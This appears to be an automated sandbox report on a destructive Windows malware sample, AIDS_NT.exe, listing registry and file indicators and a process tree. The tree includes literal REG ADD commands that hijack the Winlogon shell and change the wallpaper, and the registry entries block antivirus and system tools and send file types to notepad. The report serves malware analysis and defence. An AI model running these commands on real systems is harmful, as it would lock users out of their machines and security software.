52e0a1c02a0378774da69231586464c8c9fee1b36575786b5424fefda2f90418

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Windows\\AIDS_NT_Instructions.txt, C:\\Windows\\aids.bat, C:\\Windows\\42.exe, C:\\Windows\\1.bat"	reg.exe

Nirsoft 1 IoCs

resource	yara_rule
behavioral2/memory/4484-187-0x0000000000400000-0x000000000041C000-memory.dmp	Nirsoft

Blocks application from running via registry modification 64 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\40 = "control.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\45 = "msinfo32.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\116 = "MicrosoftEdgeCP.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\65 = "am800.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\88 = "egui.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\46 = "RecoveryDrive.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\112 = "opera_crashreporter.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "SbieSvc.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\57 = "MBAMWsc.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\71 = "ProductAgentService.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\85 = "bdredline.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\105 = "MSASCui.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\91 = "AVGBrowserCrashHandler64.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\32 = "McPvTray.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "firefox.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\111 = "mmc.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "opera.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\52 = "resmon.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "msconfig.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\53 = "Defender.exe "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\119 = "regedit.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\100 = "aswidsagent.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\109 = "msseces.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	reg.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

pid	Process
736	attrib.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	AIDS_NT.exe

Executes dropped EXE 1 IoCs

pid	Process
4484	nircmd.exe

Modifies system executable filetype association 2 TTPs 4 IoCs

persistence

Modify Registry

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "notepad.exe"	reg.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000200000001e4c3-165.dat	upx
behavioral2/files/0x0003000000000737-163.dat	upx
behavioral2/files/0x0004000000009fad-172.dat	upx
behavioral2/files/0x000200000001e634-174.dat	upx
behavioral2/files/0x0004000000009fad-186.dat	upx
behavioral2/memory/4484-187-0x0000000000400000-0x000000000041C000-memory.dmp	upx

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\1.jpg"	reg.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\1.bat	cmd.exe
File created	C:\Windows\42.exe	cmd.exe
File created	C:\Windows\1.jpg	cmd.exe
File opened for modification	C:\Windows\1.jpg	cmd.exe
File created	C:\Windows\nircmd.exe	cmd.exe
File opened for modification	C:\Windows\nircmd.exe	cmd.exe
File created	C:\Windows\1.bat	cmd.exe
File opened for modification	C:\Windows\42.exe	cmd.exe
File created	C:\Windows\AIDS_NT_Instructions.txt	cmd.exe
File opened for modification	C:\Windows\AIDS_NT_Instructions.txt	cmd.exe
File created	C:\Windows\aids.bat	cmd.exe
File opened for modification	C:\Windows\aids.bat	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "173"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pdffile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\csvfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\hfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\zipfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\slnfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\cplfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mp3file\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tiffile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dmgfile\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\docfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ctfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xlsxfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\binfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\isofile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\logfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\tiffile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\allfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\7zfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\aafile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\tmpfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ctfile\shell\open	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\shell\open\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mp4file	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mkvfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\7zfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WSFFile\Shell\Open\Command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\oggfile\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\dmgfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cfgfile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\cplfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\pngfile	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\xlsxfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\gzfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\curfile\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\afile\shell\open	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\asmfile\shell\open\command\ = "notepad.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\bmpfile\shell\open\command\ = "notepad.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\curfile	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\Shell\Open\Command\ = "notepad.exe"	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeSecurityPrivilege	3188	AIDS_NT.exe
Token: SeRestorePrivilege	3188	AIDS_NT.exe
Token: SeShutdownPrivilege	4564	shutdown.exe
Token: SeRemoteShutdownPrivilege	4564	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3172	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3188 wrote to memory of 364	3188	AIDS_NT.exe	84
PID 3188 wrote to memory of 364	3188	AIDS_NT.exe	84
PID 3188 wrote to memory of 364	3188	AIDS_NT.exe	84
PID 364 wrote to memory of 220	364	cmd.exe	87
PID 364 wrote to memory of 220	364	cmd.exe	87
PID 364 wrote to memory of 220	364	cmd.exe	87
PID 364 wrote to memory of 264	364	cmd.exe	88
PID 364 wrote to memory of 264	364	cmd.exe	88
PID 364 wrote to memory of 264	364	cmd.exe	88
PID 364 wrote to memory of 3864	364	cmd.exe	89
PID 364 wrote to memory of 3864	364	cmd.exe	89
PID 364 wrote to memory of 3864	364	cmd.exe	89
PID 3188 wrote to memory of 2628	3188	AIDS_NT.exe	90
PID 3188 wrote to memory of 2628	3188	AIDS_NT.exe	90
PID 3188 wrote to memory of 2628	3188	AIDS_NT.exe	90
PID 2628 wrote to memory of 4484	2628	cmd.exe	92
PID 2628 wrote to memory of 4484	2628	cmd.exe	92
PID 2628 wrote to memory of 4484	2628	cmd.exe	92
PID 2628 wrote to memory of 736	2628	cmd.exe	93
PID 2628 wrote to memory of 736	2628	cmd.exe	93
PID 2628 wrote to memory of 736	2628	cmd.exe	93
PID 2628 wrote to memory of 8	2628	cmd.exe	94
PID 2628 wrote to memory of 8	2628	cmd.exe	94
PID 2628 wrote to memory of 8	2628	cmd.exe	94
PID 8 wrote to memory of 4584	8	net.exe	95
PID 8 wrote to memory of 4584	8	net.exe	95
PID 8 wrote to memory of 4584	8	net.exe	95
PID 2628 wrote to memory of 1708	2628	cmd.exe	96
PID 2628 wrote to memory of 1708	2628	cmd.exe	96
PID 2628 wrote to memory of 1708	2628	cmd.exe	96
PID 2628 wrote to memory of 4832	2628	cmd.exe	97
PID 2628 wrote to memory of 4832	2628	cmd.exe	97
PID 2628 wrote to memory of 4832	2628	cmd.exe	97
PID 2628 wrote to memory of 1128	2628	cmd.exe	98
PID 2628 wrote to memory of 1128	2628	cmd.exe	98
PID 2628 wrote to memory of 1128	2628	cmd.exe	98
PID 2628 wrote to memory of 3184	2628	cmd.exe	99
PID 2628 wrote to memory of 3184	2628	cmd.exe	99
PID 2628 wrote to memory of 3184	2628	cmd.exe	99
PID 2628 wrote to memory of 1576	2628	cmd.exe	100
PID 2628 wrote to memory of 1576	2628	cmd.exe	100
PID 2628 wrote to memory of 1576	2628	cmd.exe	100
PID 2628 wrote to memory of 4468	2628	cmd.exe	101
PID 2628 wrote to memory of 4468	2628	cmd.exe	101
PID 2628 wrote to memory of 4468	2628	cmd.exe	101
PID 2628 wrote to memory of 1688	2628	cmd.exe	102
PID 2628 wrote to memory of 1688	2628	cmd.exe	102
PID 2628 wrote to memory of 1688	2628	cmd.exe	102
PID 2628 wrote to memory of 3852	2628	cmd.exe	103
PID 2628 wrote to memory of 3852	2628	cmd.exe	103
PID 2628 wrote to memory of 3852	2628	cmd.exe	103
PID 2628 wrote to memory of 3848	2628	cmd.exe	104
PID 2628 wrote to memory of 3848	2628	cmd.exe	104
PID 2628 wrote to memory of 3848	2628	cmd.exe	104
PID 2628 wrote to memory of 4612	2628	cmd.exe	105
PID 2628 wrote to memory of 4612	2628	cmd.exe	105
PID 2628 wrote to memory of 4612	2628	cmd.exe	105
PID 2628 wrote to memory of 3300	2628	cmd.exe	106
PID 2628 wrote to memory of 3300	2628	cmd.exe	106
PID 2628 wrote to memory of 3300	2628	cmd.exe	106
PID 2628 wrote to memory of 748	2628	cmd.exe	107
PID 2628 wrote to memory of 748	2628	cmd.exe	107
PID 2628 wrote to memory of 748	2628	cmd.exe	107
PID 2628 wrote to memory of 1168	2628	cmd.exe	108

Views/modifies file attributes 1 TTPs 1 IoCs

Hidden Files and Directories

pid	Process
736	attrib.exe

C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe
"C:\Users\Admin\AppData\Local\Temp\AIDS_NT.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
  2⤵
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:364
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell
    3⤵
    - Modifies WinLogon for persistence
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v Shell /d "explorer.exe, C:\Windows\AIDS_NT_Instructions.txt, C:\Windows\aids.bat, C:\Windows\42.exe, C:\Windows\1.bat"
    3⤵
    - Modifies WinLogon for persistence
    PID:264
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Windows\1.jpg /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:3864
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\PkgMgr.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\nircmd.exe
